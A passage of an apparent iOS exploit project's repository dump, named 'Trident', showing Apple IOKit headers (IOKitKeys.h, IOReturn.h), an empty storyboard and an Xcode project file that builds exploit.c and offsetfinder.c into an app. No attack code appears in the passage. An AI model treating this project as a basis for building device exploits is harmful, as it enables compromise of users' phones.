kSecondScale Scale factor for second based times. */ 213 | 214 | enum { 215 | kNanosecondScale = 1, 216 | kMicrosecondScale = 1000, 217 | kMillisecondScale = 1000 * 1000, 218 | kSecondScale = 1000 * 1000 * 1000, 219 | kTickScale = (kSecondScale / 100) 220 | }; 221 | 222 | enum { 223 | kIOConnectMethodVarOutputSize = -3 224 | }; 225 | 226 | /* compatibility types */ 227 | 228 | 229 | typedef unsigned int IODeviceNumber; 230 | 231 | 232 | #ifdef __cplusplus 233 | } 234 | #endif 235 | 236 | #endif /* ! __IOKIT_IOTYPES_H */ 237 | -------------------------------------------------------------------------------- /Trident/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /Headers/IOKit/IOKitKeys.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 30 | * 31 | * Common symbol definitions for IOKit. 32 | * 33 | * HISTORY 34 | * 35 | */ 36 | 37 | 38 | #ifndef _IOKIT_IOKITKEYS_H 39 | #define _IOKIT_IOKITKEYS_H 40 | 41 | // properties found in the registry root 42 | #define kIOKitBuildVersionKey "IOKitBuildVersion" 43 | #define kIOKitDiagnosticsKey "IOKitDiagnostics" 44 | // a dictionary keyed by plane name 45 | #define kIORegistryPlanesKey "IORegistryPlanes" 46 | #define kIOCatalogueKey "IOCatalogue" 47 | 48 | // registry plane names 49 | #define kIOServicePlane "IOService" 50 | #define kIOPowerPlane "IOPower" 51 | #define kIODeviceTreePlane "IODeviceTree" 52 | #define kIOAudioPlane "IOAudio" 53 | #define kIOFireWirePlane "IOFireWire" 54 | #define kIOUSBPlane "IOUSB" 55 | 56 | // registry ID number 57 | #define kIORegistryEntryIDKey "IORegistryEntryID" 58 | 59 | // IOService class name 60 | #define kIOServiceClass "IOService" 61 | 62 | // IOResources class name 63 | #define kIOResourcesClass "IOResources" 64 | 65 | // IOService driver probing property names 66 | #define kIOClassKey "IOClass" 67 | #define kIOProbeScoreKey "IOProbeScore" 68 | #define kIOKitDebugKey "IOKitDebug" 69 | 70 | // IOService matching property names 71 | #define kIOProviderClassKey "IOProviderClass" 72 | #define kIONameMatchKey "IONameMatch" 73 | #define kIOPropertyMatchKey "IOPropertyMatch" 74 | #define kIOPathMatchKey "IOPathMatch" 75 | #define kIOLocationMatchKey "IOLocationMatch" 76 | #define kIOParentMatchKey "IOParentMatch" 77 | #define kIOResourceMatchKey "IOResourceMatch" 78 | #define kIOMatchedServiceCountKey "IOMatchedServiceCountMatch" 79 | 80 | #define kIONameMatchedKey "IONameMatched" 81 | 82 | #define kIOMatchCategoryKey "IOMatchCategory" 83 | #define kIODefaultMatchCategoryKey "IODefaultMatchCategory" 84 | 85 | // IOService default user client class, for loadable user clients 86 | #define kIOUserClientClassKey "IOUserClientClass" 87 | 88 | // key to find IOMappers 89 | #define kIOMapperIDKey "IOMapperID" 90 | 91 | #define kIOUserClientCrossEndianKey "IOUserClientCrossEndian" 92 | #define kIOUserClientCrossEndianCompatibleKey "IOUserClientCrossEndianCompatible" 93 | #define kIOUserClientSharedInstanceKey "IOUserClientSharedInstance" 94 | // diagnostic string describing the creating task 95 | #define kIOUserClientCreatorKey "IOUserClientCreator" 96 | 97 | // IOService notification types 98 | #define kIOPublishNotification "IOServicePublish" 99 | #define kIOFirstPublishNotification "IOServiceFirstPublish" 100 | #define kIOMatchedNotification "IOServiceMatched" 101 | #define kIOFirstMatchNotification "IOServiceFirstMatch" 102 | #define kIOTerminatedNotification "IOServiceTerminate" 103 | 104 | // IOService interest notification types 105 | #define kIOGeneralInterest "IOGeneralInterest" 106 | #define kIOBusyInterest "IOBusyInterest" 107 | #define kIOAppPowerStateInterest "IOAppPowerStateInterest" 108 | #define kIOPriorityPowerStateInterest "IOPriorityPowerStateInterest" 109 | 110 | #define kIOPlatformDeviceMessageKey "IOPlatformDeviceMessage" 111 | 112 | // IOService interest notification types 113 | #define kIOCFPlugInTypesKey "IOCFPlugInTypes" 114 | 115 | // properties found in services that implement command pooling 116 | #define kIOCommandPoolSizeKey "IOCommandPoolSize" // (OSNumber) 117 | 118 | // properties found in services that implement priority 119 | #define kIOMaximumPriorityCountKey "IOMaximumPriorityCount" // (OSNumber) 120 | 121 | // properties found in services that have transfer constraints 122 | #define kIOMaximumBlockCountReadKey "IOMaximumBlockCountRead" // (OSNumber) 123 | #define kIOMaximumBlockCountWriteKey "IOMaximumBlockCountWrite" // (OSNumber) 124 | #define kIOMaximumByteCountReadKey "IOMaximumByteCountRead" // (OSNumber) 125 | #define kIOMaximumByteCountWriteKey "IOMaximumByteCountWrite" // (OSNumber) 126 | #define kIOMaximumSegmentCountReadKey "IOMaximumSegmentCountRead" // (OSNumber) 127 | #define kIOMaximumSegmentCountWriteKey "IOMaximumSegmentCountWrite" // (OSNumber) 128 | #define kIOMaximumSegmentByteCountReadKey "IOMaximumSegmentByteCountRead" // (OSNumber) 129 | #define kIOMaximumSegmentByteCountWriteKey "IOMaximumSegmentByteCountWrite" // (OSNumber) 130 | #define kIOMinimumSegmentAlignmentByteCountKey "IOMinimumSegmentAlignmentByteCount" // (OSNumber) 131 | #define kIOMaximumSegmentAddressableBitCountKey "IOMaximumSegmentAddressableBitCount" // (OSNumber) 132 | 133 | // properties found in services that wish to describe an icon 134 | // 135 | // IOIcon = 136 | // { 137 | // CFBundleIdentifier = "com.example.driver.example"; 138 | // IOBundleResourceFile = "example.icns"; 139 | // }; 140 | // 141 | // where IOBundleResourceFile is the filename of the resource 142 | 143 | #define kIOIconKey "IOIcon" // (OSDictionary) 144 | #define kIOBundleResourceFileKey "IOBundleResourceFile" // (OSString) 145 | 146 | #define kIOBusBadgeKey "IOBusBadge" // (OSDictionary) 147 | #define kIODeviceIconKey "IODeviceIcon" // (OSDictionary) 148 | 149 | // property of root that describes the machine's serial number as a string 150 | #define kIOPlatformSerialNumberKey "IOPlatformSerialNumber" // (OSString) 151 | 152 | // property of root that describes the machine's UUID as a string 153 | #define kIOPlatformUUIDKey "IOPlatformUUID" // (OSString) 154 | 155 | // IODTNVRAM property keys 156 | #define kIONVRAMDeletePropertyKey "IONVRAM-DELETE-PROPERTY" 157 | #define kIONVRAMSyncNowPropertyKey "IONVRAM-SYNCNOW-PROPERTY" 158 | #define kIONVRAMActivateCSRConfigPropertyKey "IONVRAM-ARMCSR-PROPERTY" 159 | #define kIODTNVRAMPanicInfoKey "aapl,panic-info" 160 | 161 | // keys for complex boot information 162 | #define kIOBootDeviceKey "IOBootDevice" // dict | array of dicts 163 | #define kIOBootDevicePathKey "IOBootDevicePath" // arch-neutral OSString 164 | #define kIOBootDeviceSizeKey "IOBootDeviceSize" // OSNumber of bytes 165 | 166 | // keys for OS Version information 167 | #define kOSBuildVersionKey "OS Build Version" 168 | 169 | #endif /* ! _IOKIT_IOKITKEYS_H */ 170 | -------------------------------------------------------------------------------- /Headers/IOKit/IOReturn.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * HISTORY 30 | */ 31 | 32 | /* 33 | * Core IOReturn values. Others may be family defined. 34 | */ 35 | 36 | #ifndef __IOKIT_IORETURN_H 37 | #define __IOKIT_IORETURN_H 38 | 39 | #ifdef __cplusplus 40 | extern "C" { 41 | #endif 42 | 43 | #include 44 | 45 | typedef kern_return_t IOReturn; 46 | 47 | #ifndef sys_iokit 48 | #define sys_iokit err_system(0x38) 49 | #endif /* sys_iokit */ 50 | #define sub_iokit_common err_sub(0) 51 | #define sub_iokit_usb err_sub(1) 52 | #define sub_iokit_firewire err_sub(2) 53 | #define sub_iokit_block_storage err_sub(4) 54 | #define sub_iokit_graphics err_sub(5) 55 | #define sub_iokit_networking err_sub(6) 56 | #define sub_iokit_bluetooth err_sub(8) 57 | #define sub_iokit_pmu err_sub(9) 58 | #define sub_iokit_acpi err_sub(10) 59 | #define sub_iokit_smbus err_sub(11) 60 | #define sub_iokit_ahci err_sub(12) 61 | #define sub_iokit_powermanagement err_sub(13) 62 | #define sub_iokit_hidsystem err_sub(14) 63 | #define sub_iokit_scsi err_sub(16) 64 | #define sub_iokit_usbaudio err_sub(17) 65 | //#define sub_iokit_pccard err_sub(21) 66 | #define sub_iokit_thunderbolt err_sub(29) 67 | #define sub_iokit_platform err_sub(0x2A) 68 | #define sub_iokit_audio_video err_sub(0x45) 69 | #define sub_iokit_baseband err_sub(0x80) 70 | #define sub_iokit_HDA err_sub(254) 71 | #define sub_iokit_hsic err_sub(0x147) 72 | #define sub_iokit_sdio err_sub(0x174) 73 | #define sub_iokit_wlan err_sub(0x208) 74 | 75 | #define sub_iokit_vendor_specific err_sub(-2) 76 | #define sub_iokit_reserved err_sub(-1) 77 | 78 | #define iokit_common_err(return) (sys_iokit|sub_iokit_common|return) 79 | #define iokit_family_err(sub,return) (sys_iokit|sub|return) 80 | #define iokit_vendor_specific_err(return) (sys_iokit|sub_iokit_vendor_specific|return) 81 | 82 | #define kIOReturnSuccess KERN_SUCCESS // OK 83 | #define kIOReturnError iokit_common_err(0x2bc) // general error 84 | #define kIOReturnNoMemory iokit_common_err(0x2bd) // can't allocate memory 85 | #define kIOReturnNoResources iokit_common_err(0x2be) // resource shortage 86 | #define kIOReturnIPCError iokit_common_err(0x2bf) // error during IPC 87 | #define kIOReturnNoDevice iokit_common_err(0x2c0) // no such device 88 | #define kIOReturnNotPrivileged iokit_common_err(0x2c1) // privilege violation 89 | #define kIOReturnBadArgument iokit_common_err(0x2c2) // invalid argument 90 | #define kIOReturnLockedRead iokit_common_err(0x2c3) // device read locked 91 | #define kIOReturnLockedWrite iokit_common_err(0x2c4) // device write locked 92 | #define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and 93 | // device already open 94 | #define kIOReturnBadMessageID iokit_common_err(0x2c6) // sent/received messages 95 | // had different msg_id 96 | #define kIOReturnUnsupported iokit_common_err(0x2c7) // unsupported function 97 | #define kIOReturnVMError iokit_common_err(0x2c8) // misc. VM failure 98 | #define kIOReturnInternalError iokit_common_err(0x2c9) // internal error 99 | #define kIOReturnIOError iokit_common_err(0x2ca) // General I/O error 100 | //#define kIOReturn???Error iokit_common_err(0x2cb) // ??? 101 | #define kIOReturnCannotLock iokit_common_err(0x2cc) // can't acquire lock 102 | #define kIOReturnNotOpen iokit_common_err(0x2cd) // device not open 103 | #define kIOReturnNotReadable iokit_common_err(0x2ce) // read not supported 104 | #define kIOReturnNotWritable iokit_common_err(0x2cf) // write not supported 105 | #define kIOReturnNotAligned iokit_common_err(0x2d0) // alignment error 106 | #define kIOReturnBadMedia iokit_common_err(0x2d1) // Media Error 107 | #define kIOReturnStillOpen iokit_common_err(0x2d2) // device(s) still open 108 | #define kIOReturnRLDError iokit_common_err(0x2d3) // rld failure 109 | #define kIOReturnDMAError iokit_common_err(0x2d4) // DMA failure 110 | #define kIOReturnBusy iokit_common_err(0x2d5) // Device Busy 111 | #define kIOReturnTimeout iokit_common_err(0x2d6) // I/O Timeout 112 | #define kIOReturnOffline iokit_common_err(0x2d7) // device offline 113 | #define kIOReturnNotReady iokit_common_err(0x2d8) // not ready 114 | #define kIOReturnNotAttached iokit_common_err(0x2d9) // device not attached 115 | #define kIOReturnNoChannels iokit_common_err(0x2da) // no DMA channels left 116 | #define kIOReturnNoSpace iokit_common_err(0x2db) // no space for data 117 | //#define kIOReturn???Error iokit_common_err(0x2dc) // ??? 118 | #define kIOReturnPortExists iokit_common_err(0x2dd) // port already exists 119 | #define kIOReturnCannotWire iokit_common_err(0x2de) // can't wire down 120 | // physical memory 121 | #define kIOReturnNoInterrupt iokit_common_err(0x2df) // no interrupt attached 122 | #define kIOReturnNoFrames iokit_common_err(0x2e0) // no DMA frames enqueued 123 | #define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received 124 | // on interrupt port 125 | #define kIOReturnNotPermitted iokit_common_err(0x2e2) // not permitted 126 | #define kIOReturnNoPower iokit_common_err(0x2e3) // no power to device 127 | #define kIOReturnNoMedia iokit_common_err(0x2e4) // media not present 128 | #define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted 129 | #define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode 130 | #define kIOReturnUnderrun iokit_common_err(0x2e7) // data underrun 131 | #define kIOReturnOverrun iokit_common_err(0x2e8) // data overrun 132 | #define kIOReturnDeviceError iokit_common_err(0x2e9) // the device is not working properly! 133 | #define kIOReturnNoCompletion iokit_common_err(0x2ea) // a completion routine is required 134 | #define kIOReturnAborted iokit_common_err(0x2eb) // operation aborted 135 | #define kIOReturnNoBandwidth iokit_common_err(0x2ec) // bus bandwidth would be exceeded 136 | #define kIOReturnNotResponding iokit_common_err(0x2ed) // device not responding 137 | #define kIOReturnIsoTooOld iokit_common_err(0x2ee) // isochronous I/O request for distant past! 138 | #define kIOReturnIsoTooNew iokit_common_err(0x2ef) // isochronous I/O request for distant future 139 | #define kIOReturnNotFound iokit_common_err(0x2f0) // data was not found 140 | #define kIOReturnInvalid iokit_common_err(0x1) // should never be seen 141 | 142 | #ifdef __cplusplus 143 | } 144 | #endif 145 | 146 | #endif /* ! __IOKIT_IORETURN_H */ 147 | -------------------------------------------------------------------------------- /Trident.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 46; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 437AE36C1E01CC7600FA5A89 /* offsetfinder.c in Sources */ = {isa = PBXBuildFile; fileRef = 437AE36A1E01CC7600FA5A89 /* offsetfinder.c */; }; 11 | 43CDFA481DCFA16600046EB0 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 43CDFA471DCFA16600046EB0 /* main.m */; }; 12 | 43CDFA4B1DCFA16600046EB0 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 43CDFA4A1DCFA16600046EB0 /* AppDelegate.m */; }; 13 | 43CDFA4E1DCFA16600046EB0 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 43CDFA4D1DCFA16600046EB0 /* ViewController.m */; }; 14 | 43CDFA511DCFA16600046EB0 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 43CDFA4F1DCFA16600046EB0 /* Main.storyboard */; }; 15 | 43CDFA531DCFA16600046EB0 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 43CDFA521DCFA16600046EB0 /* Assets.xcassets */; }; 16 | 43CDFA561DCFA16600046EB0 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 43CDFA541DCFA16600046EB0 /* LaunchScreen.storyboard */; }; 17 | 43CDFA5E1DCFA1DE00046EB0 /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 43CDFA5D1DCFA1DE00046EB0 /* IOKit.framework */; }; 18 | 43CDFA721DCFA34300046EB0 /* exploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 43CDFA711DCFA34300046EB0 /* exploit.c */; }; 19 | /* End PBXBuildFile section */ 20 | 21 | /* Begin PBXFileReference section */ 22 | 437AE36A1E01CC7600FA5A89 /* offsetfinder.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsetfinder.c; sourceTree = ""; }; 23 | 437AE36B1E01CC7600FA5A89 /* offsetfinder.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsetfinder.h; sourceTree = ""; }; 24 | 43CDFA431DCFA16600046EB0 /* Trident.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Trident.app; sourceTree = BUILT_PRODUCTS_DIR; }; 25 | 43CDFA471DCFA16600046EB0 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 26 | 43CDFA491DCFA16600046EB0 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 27 | 43CDFA4A1DCFA16600046EB0 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 28 | 43CDFA4C1DCFA16600046EB0 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 29 | 43CDFA4D1DCFA16600046EB0 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 30 | 43CDFA501DCFA16600046EB0 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 31 | 43CDFA521DCFA16600046EB0 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 32 | 43CDFA551DCFA16600046EB0 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 33 | 43CDFA571DCFA16600046EB0 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 34 | 43CDFA5D1DCFA1DE00046EB0 /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/System/Library/Frameworks/IOKit.framework; sourceTree = DEVELOPER_DIR; }; 35 | 43CDFA661DCFA26C00046EB0 /* IOKitKeys.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = IOKitKeys.h; path = Headers/IOKit/IOKitKeys.h; sourceTree = ""; }; 36 | 43CDFA671DCFA26C00046EB0 /* IOKitLib.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = IOKitLib.h; path = Headers/IOKit/IOKitLib.h; sourceTree = ""; }; 37 | 43CDFA681DCFA26C00046EB0 /* iokitmig.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = iokitmig.h; path = Headers/IOKit/iokitmig.h; sourceTree = ""; }; 38 | 43CDFA691DCFA26C00046EB0 /* IOReturn.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = IOReturn.h; path = Headers/IOKit/IOReturn.h; sourceTree = ""; }; 39 | 43CDFA6A1DCFA26C00046EB0 /* IOTypes.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = IOTypes.h; path = Headers/IOKit/IOTypes.h; sourceTree = ""; }; 40 | 43CDFA6B1DCFA26C00046EB0 /* OSMessageNotification.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = OSMessageNotification.h; path = Headers/IOKit/OSMessageNotification.h; sourceTree = ""; }; 41 | 43CDFA711DCFA34300046EB0 /* exploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = exploit.c; sourceTree = ""; }; 42 | /* End PBXFileReference section */ 43 | 44 | /* Begin PBXFrameworksBuildPhase section */ 45 | 43CDFA401DCFA16600046EB0 /* Frameworks */ = { 46 | isa = PBXFrameworksBuildPhase; 47 | buildActionMask = 2147483647; 48 | files = ( 49 | 43CDFA5E1DCFA1DE00046EB0 /* IOKit.framework in Frameworks */, 50 | ); 51 | runOnlyForDeploymentPostprocessing = 0; 52 | }; 53 | /* End PBXFrameworksBuildPhase section */ 54 | 55 | /* Begin PBXGroup section */ 56 | 43CDFA3A1DCFA16600046EB0 = { 57 | isa = PBXGroup; 58 | children = ( 59 | 43CDFA451DCFA16600046EB0 /* Trident */, 60 | 43CDFA6C1DCFA27800046EB0 /* Headers */, 61 | 43CDFA5F1DCFA1E300046EB0 /* Frameworks */, 62 | 43CDFA441DCFA16600046EB0 /* Products */, 63 | ); 64 | sourceTree = ""; 65 | }; 66 | 43CDFA441DCFA16600046EB0 /* Products */ = { 67 | isa = PBXGroup; 68 | children = ( 69 | 43CDFA431DCFA16600046EB0 /* Trident.app */, 70 | ); 71 | name = Products; 72 | sourceTree = ""; 73 | }; 74 | 43CDFA451DCFA16600046EB0 /* Trident */ = { 75 | isa = PBXGroup; 76 | children = ( 77 | 43CDFA491DCFA16600046EB0 /* AppDelegate.h */, 78 | 43CDFA4A1DCFA16600046EB0 /* AppDelegate.m */, 79 | 43CDFA4C1DCFA16600046EB0 /* ViewController.h */, 80 | 43CDFA4D1DCFA16600046EB0 /* ViewController.m */, 81 | 43CDFA4F1DCFA16600046EB0 /* Main.storyboard */, 82 | 43CDFA521DCFA16600046EB0 /* Assets.xcassets */, 83 | 43CDFA541DCFA16600046EB0 /* LaunchScreen.storyboard */, 84 | 43CDFA571DCFA16600046EB0 /* Info.plist */, 85 | 43CDFA461DCFA16600046EB0 /* Supporting Files */, 86 | 43CDFA711DCFA34300046EB0 /* exploit.c */, 87 | 437AE36A1E01CC7600FA5A89 /* offsetfinder.c */, 88 | 437AE36B1E01CC7600FA5A89 /* offsetfinder.h */, 89 | ); 90 | path = Trident; 91 | sourceTree = ""; 92 | }; 93 | 43CDFA461DCFA16600046EB0 /* Supporting Files */ = { 94 | isa = PBXGroup; 95 | children = ( 96 | 43CDFA471DCFA16600046EB0 /* main.m */, 97 | ); 98 | name = "Supporting Files"; 99 | sourceTree = ""; 100 | }; 101 | 43CDFA5F1DCFA1E300046EB0 /* Frameworks */ = { 102 | isa = PBXGroup; 103 | children = ( 104 | 43CDFA5D1DCFA1DE00046EB0 /* IOKit.framework */, 105 | ); 106 | name = Frameworks; 107 | sourceTree = ""; 108 | }; 109 | 43CDFA6C1DCFA27800046EB0 /* Headers */ = { 110 | isa = PBXGroup; 111 | children = ( 112 | 43CDFA6D1DCFA27F00046EB0 /* IOKit */, 113 | ); 114 | name = Headers; 115 | sourceTree = ""; 116 | }; 117 | 43CDFA6D1DCFA27F00046EB0 /* IOKit */ = { 118 | isa = PBXGroup; 119 | children = ( 120 | 43CDFA661DCFA26C00046EB0 /* IOKitKeys.h */, 121 | 43CDFA671DCFA26C00046EB0 /* IOKitLib.h */, 122 | 43CDFA681DCFA26C00046EB0 /* iokitmig.h */, 123 | 43CDFA691DCFA26C00046EB0 /* IOReturn.h */, 124 | 43CDFA6A1DCFA26C00046EB0 /* IOTypes.h */, 125 | 43CDFA6B1DCFA26C00046EB0 /* OSMessageNotification.h */, 126 | ); 127 | name = IOKit; 128 | sourceTree = ""; 129 | }; 130 | /* End PBXGroup section */ 131 | 132 | /* Begin PBXNativeTarget section */ 133 | 43CDFA421DCFA16600046EB0 /* Trident */ = { 134 | isa = PBXNativeTarget; 135 | buildConfigurationList = 43CDFA5A1DCFA16600046EB0 /* Build configuration list for PBXNativeTarget "Trident" */; 136 | buildPhases = ( 137 | 43CDFA3F1DCFA16600046EB0 /* Sources */, 138 | 43CDFA401DCFA16600046EB0 /* Frameworks */, 139 | 43CDFA411DCFA16600046EB0 /* Resources */, 140 | ); 141 | buildRules = ( 142 | ); 143 | dependencies = ( 144 | ); 145 | name = Trident; 146 | productName = Trident; 147 | productReference = 43CDFA431DCFA16600046EB0 /* Trident.app */; 148 | productType = "com.apple.product-type.application"; 149 | }; 150 | /* End PBXNativeTarget section */ 151 | 152 | /* Begin PBXProject section */ 153 | 43CDFA3B1DCFA16600046EB0 /* Project object */ = { 154 | isa = PBXProject; 155 | attributes = { 156 | LastUpgradeCheck = 0810; 157 | ORGANIZATIONNAME = "Benjamin Randazzo"; 158 | TargetAttributes = { 159 | 43CDFA421DCFA16600046EB0 = { 160 | CreatedOnToolsVersion = 7.3.1; 161 | DevelopmentTeam = 4P3PNUDM94; 162 | }; 163 | }; 164 | }; 165 | buildConfigurationList = 43CDFA3E1DCFA16600046EB0 /* Build configuration list for PBXProject "Trident" */; 166 | compatibilityVersion = "Xcode 3.2"; 167 | developmentRegion = English; 168 | hasScannedForEncodings = 0; 169 | knownRegions = ( 170 | en, 171 | Base, 172 | ); 173 | mainGroup = 43CDFA3A1DCFA16600046EB0; 174 | productRefGroup = 43CDFA441DCFA16600046EB0 /* Products */; 175 | projectDirPath = ""; 176 | projectRoot = ""; 177 | targets = ( 178 | 43CDFA421DCFA16600046EB0 /* Trident */, 179 | ); 180 | }; 181 | /* End PBXProject section */ 182 | 183 | /* Begin PBXResourcesBuildPhase section */ 184 | 43CDFA411DCFA16600046EB0 /* Resources */ = { 185 | isa = PBXResourcesBuildPhase; 186 | buildActionMask = 2147483647; 187 | files = ( 188 | 43CDFA561DCFA16600046EB0 /* LaunchScreen.storyboard in Resources */, 189 | 43CDFA531DCFA16600046EB0 /* Assets.xcassets in Resources */, 190 | 43CDFA511DCFA16600046EB0 /* Main.storyboard in Resources */, 191 | ); 192 | runOnlyForDeploymentPostprocessing = 0; 193 | }; 194 | /* End PBXResourcesBuildPhase section */ 195 | 196 | /* Begin PBXSourcesBuildPhase section */ 197 | 43CDFA3F1DCFA16600046EB0 /* Sources */ = { 198 | isa = PBXSourcesBuildPhase; 199 | buildActionMask = 2147483647; 200 | files = ( 201 | 43CDFA4E1DCFA16600046EB0 /* ViewController.m in Sources */, 202 | 43CDFA4B1DCFA16600046EB0 /* AppDelegate.m in Sources */, 203 | 43CDFA481DCFA16600046EB0 /* main.m in Sources */, 204 | 437AE36C1E01CC7600FA5A89 /* offsetfinder.c in Sources */, 205 | 43CDFA721DCFA34300046EB0 /* exploit.c in Sources */, 206 | ); 207 | runOnlyForDeploymentPostprocessing = 0; 208 | }; 209 | /* End PBXSourcesBuildPhase section */ 210 | 211 | /* Begin PBXVariantGroup section */ 212 | 43CDFA4F1DCFA16600046EB0 /* Main.storyboard */ = { 213 | isa = PBXVariantGroup; 214 | children = ( 215 | 43CDFA501DCFA16600046EB0 /* Base */, 216 | ); 217 | name = Main.storyboard; 218 | sourceTree = ""; 219 | }; 220 | 43CDFA541DCFA16600046EB0 /* LaunchScreen.storyboard */ = { 221 | isa = PBXVariantGroup; 222 | children = ( 223 | 43CDFA551DCFA16600046EB0 /* Base */, 224 | ); 225 | name = LaunchScreen.storyboard; 226 | sourceTree = ""; 227 | }; 228 | /* End PBXVariantGroup section */ 229 | 230 | /* Begin XCBuildConfiguration section */ 231 | 43CDFA581DCFA16600046EB0 /* Debug */ = { 232 | isa = XCBuildConfiguration; 233 | buildSettings = { 234 | ALWAYS_SEARCH_USER_PATHS = NO; 235 | CLANG_ANALYZER_NONNULL = 